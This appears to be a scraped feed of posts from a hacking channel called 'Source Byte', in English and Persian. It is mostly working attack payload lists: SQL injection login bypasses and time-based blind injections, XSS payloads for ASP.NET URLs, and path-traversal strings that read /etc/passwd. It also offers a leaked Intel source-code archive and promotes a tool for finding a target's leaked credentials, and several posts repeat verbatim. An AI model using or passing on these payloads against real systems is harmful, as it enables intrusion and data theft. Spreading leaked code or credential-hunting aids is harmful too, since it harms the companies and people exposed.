Source Byte
Login Bypass 🌵 #SQLi param=' param=" param=' or 1=1 param=' or 1=0 param=' and 1=1 ' or sleep(2) and 1=1# ' or sleep(2)# admin' and sleep(2)# ' union select sleep(2),null# ' union select sleep(2),null,null,null,null# Part 1🥶
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
Part 2 🥶
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
Part 2 🥶
JSON Crack is a tool that generates graph diagrams from JSON objects
https://github.com/AykutSarac/jsoncrack.com
https://github.com/AykutSarac/jsoncrack.com
❤2
AlderLake_part_1.7z
1.5 GB
The source code of Intel Alder Lake processors has appeared on the web.
Intel has confirmed that some of the source code and internal documentation for Alder Lake has been leaked and clarified that the data from this leak, which has been published in public sources, is genuine.
کد منبع پردازنده های Intel Alder Lake .
اینتل تایید کرده است که برخی از کد منبع و اسناد داخلی Alder Lake به بیرون درز کرده است و اعلام کرده است که داده های این نشت که در منابع عمومی منتشر شده است، واقعی است.
Intel has confirmed that some of the source code and internal documentation for Alder Lake has been leaked and clarified that the data from this leak, which has been published in public sources, is genuine.
کد منبع پردازنده های Intel Alder Lake .
اینتل تایید کرده است که برخی از کد منبع و اسناد داخلی Alder Lake به بیرون درز کرده است و اعلام کرده است که داده های این نشت که در منابع عمومی منتشر شده است، واقعی است.
❤2
🥶Add to your SQL injection payload list 🥶
1%27//%256fR//50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
1%27//%256fR//50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
🔥3
XSS payloads for http://ASP.NET endpoints:
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
For more ➡️ http://blog.isec.pl/all-is-xss-that-comes-to-the-net/
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
For more ➡️ http://blog.isec.pl/all-is-xss-that-comes-to-the-net/
Some filter bypass payload list while hunting for LFi vulnerability
→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
→index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
→index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
👍4
$10,000 From GitHub For Bypassing Filtration oF HTML tags
https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37
https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37
❤3😱1
Converting LFI into RCE by chaining PHP encoding filters
https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html
https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html
🔥2👍1
سرویس SocialPwned به شما امکان میدهد ایمیلهایی را از هدف دریافت کنید که در شبکههای اجتماعی مانند اینستاگرام، لینکدین و توییتر منتشر شدهاند تا نشتهای احتمالی را در PwnDB یا Dehashed پیدا کنید و اطلاعات حساب Google را از طریق GHunt به دست آورید.
GitHub
GitHub - MrTuxx/SocialPwned: SocialPwned is an OSINT tool that allows to get the emails, from a target, published in social networks…
SocialPwned is an OSINT tool that allows to get the emails, from a target, published in social networks such as Instagram, Linkedin and Twitter to find possible credentials leaks in PwnDB or Dehash...